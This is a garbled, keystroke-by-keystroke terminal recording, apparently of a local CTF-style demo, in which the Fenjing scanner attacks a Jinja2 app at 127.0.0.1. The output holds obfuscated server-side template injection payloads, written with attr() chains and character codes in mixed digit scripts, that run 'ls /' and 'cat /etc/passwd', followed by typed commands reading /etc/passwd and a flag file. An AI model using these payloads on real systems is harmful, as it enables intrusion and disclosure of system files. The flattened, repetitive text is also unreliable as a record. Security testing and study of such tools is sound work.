hon-➜Fenjinggit:(dev)✗python-mf➜Fenjinggit:(dev)✗python-mfe➜Fenjinggit:(dev)✗python-mfen➜Fenjinggit:(dev)✗python-mfenj➜Fenjinggit:(dev)✗python-mfenji➜Fenjinggit:(dev)✗python-mfenjin➜Fenjinggit:(dev)✗python-mfenjings➜Fenjinggit:(dev)✗python-mfenjingsc➜Fenjinggit:(dev)✗python-mfenjingsca➜Fenjinggit:(dev)✗python-mfenjingscan-➜Fenjinggit:(dev)✗python-mfenjingscan--➜Fenjinggit:(dev)✗python-mfenjingscan--u➜Fenjinggit:(dev)✗python-mfenjingscan--ur➜Fenjinggit:(dev)✗python-mfenjingscan--url'➜Fenjinggit:(dev)✗python-mfenjingscan--url'http://127.0.0.1:7888/secr3tttttt'-ttt'--ttt'--ittt'--inttt'--intttt'--intettt'--interttt'--intervttt'--intervattt'--interval0ttt'--interval0.ttt'--interval0.0$>>l(go)|attr(gi)(bi)|attr(gi)(by)((1٠٨,115,32,4٧),)|attr(de)(),)|attr(re)()}}$>>cat/e$>>cat/et$>>cat/etc$>>cat/etc/$>>cat/etc/p$>>cat/etc/pa$>>cat/etc/pas$>>cat/etc/pass$>>cat/etc/passw(go)|attr(gi)(bi)|attr(gi)(by)((9٩,97,116,32,4٧,1٠١,116,9٩,4٧,112,97,115,115,119,1٠٠),)|attr(de)(),)|attr(re)()}}$>>cat/f$>>cat/fl$>>cat/fla
\ No newline at end of file